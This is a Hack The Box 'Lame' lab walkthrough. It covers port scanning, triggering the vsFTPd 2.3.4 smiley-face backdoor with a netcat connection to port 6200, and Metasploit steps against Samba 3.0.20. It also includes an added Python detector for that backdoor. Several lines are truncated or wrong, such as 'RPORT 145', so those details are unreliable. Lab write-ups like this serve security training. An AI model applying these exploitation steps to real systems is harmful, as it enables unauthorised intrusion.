
Linux Box Lame Walkthrough 


The first step is to find our machine in Hack The Box, then in our VM run sudo openvpn <.ovpn file> and ping our target box. If the TTL is between 1-64, generally it is a Linux box. 64-128 is probably a Windows host. 128-255 is a network appliance. This isn't always the case, but generally, this can be true.


MITRE ATT&CK T1595 Active Scanning. We will run (sudo nmap -vv -Pn -sCV -p0-65535 --reason -oN lame.nmap <target IP>). This will assume the host is active, run the default scripts, do version enumeration, show the reason each port is reported in its state, and export the results to an output file called lame.nmap.


T1592.002 Gather Victim Host Info. We see that port 21 is available on the host, so while nmap is still running we gather info. (Ftp


We then get a banner that says that it is running vsFTPd 2.3.4.


We will then open searchsploit and search for vsFTPd.




Search vsftpd


We can exploit this by using Metasploit, but if we look at the code we can see that it has a hard-coded smiley face in the ID field that opens the backdoor :)


We can go back to ftp and use :). To use this we will send USER username:) and PASS test.


We then nc to port 6200. When we enter id, we see that nothing happens, so we continue our exploitation by looking at our scan. We see that 22 is open, but that isn't always the easiest to exploit; we see SMB is open as well and decide to search for that.
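Seen from the defending side, the two steps above leave a clear trace: a USER command containing :) followed by a connection to port 6200 on the same server. The detector below is an added example, not part of the original walkthrough; the log format, the sample events and the 60-second correlation window are all constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not from the walkthrough): FTP commands and TCP
# connections in a made-up "timestamp src -> dst:port proto detail" format.
SAMPLE_LOG = """\
2024-01-10T12:00:01 10.0.0.5 -> 10.0.0.20:21 FTP USER anonymous
2024-01-10T12:00:02 10.0.0.5 -> 10.0.0.20:21 FTP PASS guest
2024-01-10T12:03:10 10.0.0.9 -> 10.0.0.20:21 FTP USER username:)
2024-01-10T12:03:11 10.0.0.9 -> 10.0.0.20:21 FTP PASS test
2024-01-10T12:03:15 10.0.0.9 -> 10.0.0.20:6200 TCP SYN
2024-01-10T12:30:00 10.0.0.7 -> 10.0.0.21:6200 TCP SYN
"""

LINE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (\S+) ?(.*)$")
BACKDOOR_PORT = 6200            # port the walkthrough connects to with nc
WINDOW = timedelta(seconds=60)  # assumed correlation window


def parse(log):
    """Yield (time, src, dst, port, proto, detail) for each well-formed line."""
    for raw in log.splitlines():
        m = LINE.match(raw)
        if m:
            ts, src, dst, port, proto, detail = m.groups()
            yield datetime.fromisoformat(ts), src, dst, int(port), proto, detail


def detect(log):
    """Return alerts for ':)' usernames and for connections to port 6200."""
    alerts, triggers = [], {}   # triggers: server IP -> time of last ':)' login
    for ts, src, dst, port, proto, detail in parse(log):
        if proto == "FTP" and detail.startswith("USER ") and ":)" in detail[5:]:
            triggers[dst] = ts
            alerts.append(("smiley-username", src, dst))
        elif proto == "TCP" and port == BACKDOOR_PORT:
            seen = triggers.get(dst)
            if seen is not None and ts - seen <= WINDOW:
                alerts.append(("backdoor-port-after-trigger", src, dst))
            else:
                alerts.append(("port-6200-uncorrelated", src, dst))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```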


searchsploit smb 3.0.20 and searchsploit samba 3.0.20

  1. In msfconsole, search samba 3.0.20

  2. Use 0

  3. Options

  4. Set RHOST

  5. Set RPORT 145

  6. Set LHOST to our VPN address from HTB

  7. With our payload set to automatic, run


Sudo smbclient --no-pass //

Lessons Learned

The Hack The Box Lame challenge provided valuable insights into ethical hacking and exploit discovery. By leveraging MITRE attack methods, I successfully navigated the challenge using steps that included active scanning and gathering victim host information. Through careful observation and analysis of the target machine, I was able to identify vulnerabilities and potential exploits. By examining the banner response of the FTP server, I discovered the version of vsFTPd running, which led me to search for specific exploits. Using the Metasploit Framework, I configured the necessary options and executed the chosen exploits. The challenge highlighted the importance of persistence and the understanding that not all vulnerabilities directly lead to access, but they can serve as crucial steps toward achieving the ultimate goal.
